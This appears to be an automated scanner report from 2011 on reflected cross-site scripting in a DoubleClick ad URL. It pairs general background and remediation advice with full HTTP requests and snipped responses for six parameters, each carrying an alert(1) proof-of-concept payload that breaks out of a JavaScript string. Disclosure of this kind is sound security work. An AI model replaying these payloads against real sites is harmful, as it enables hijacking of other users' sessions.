Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the campID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e9c8"-alert(1)-"ed8d98066a7 was submitted in the campID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=527545e9c8"-alert(1)-"ed8d98066a7&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:31:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8925
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=527545e9c8"-alert(1)-"ed8d98066a7&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D87663 ...[SNIP]...
The value of the crID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59e74"-alert(1)-"6726dbbe500 was submitted in the crID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=7358359e74"-alert(1)-"6726dbbe500&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:31:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8982
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=7358359e74"-alert(1)-"6726dbbe500&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F ...[SNIP]...
The value of the partnerID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 112f0"-alert(1)-"3c37d85996f was submitted in the partnerID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219112f0"-alert(1)-"3c37d85996f&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:32:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8953
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... %3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219112f0"-alert(1)-"3c37d85996f&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=http%3a%2f%2ffree.turbotax.c ...[SNIP]...
The value of the pub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d3b8"-alert(1)-"ad6539c90a was submitted in the pub parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=586611d3b8"-alert(1)-"ad6539c90a&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:32:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8942
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=586611d3b8"-alert(1)-"ad6539c90a&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=http%3a%2f%2fl ...[SNIP]...
The value of the pubICode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b3b5"-alert(1)-"6e28e40048e was submitted in the pubICode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=15029518b3b5"-alert(1)-"6e28e40048e&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:32:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8953
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=15029518b3b5"-alert(1)-"6e28e40048e&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=http ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ddba6"-alert(1)-"6c8bf62d897 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583ddba6"-alert(1)-"6c8bf62d897&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:31:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8941
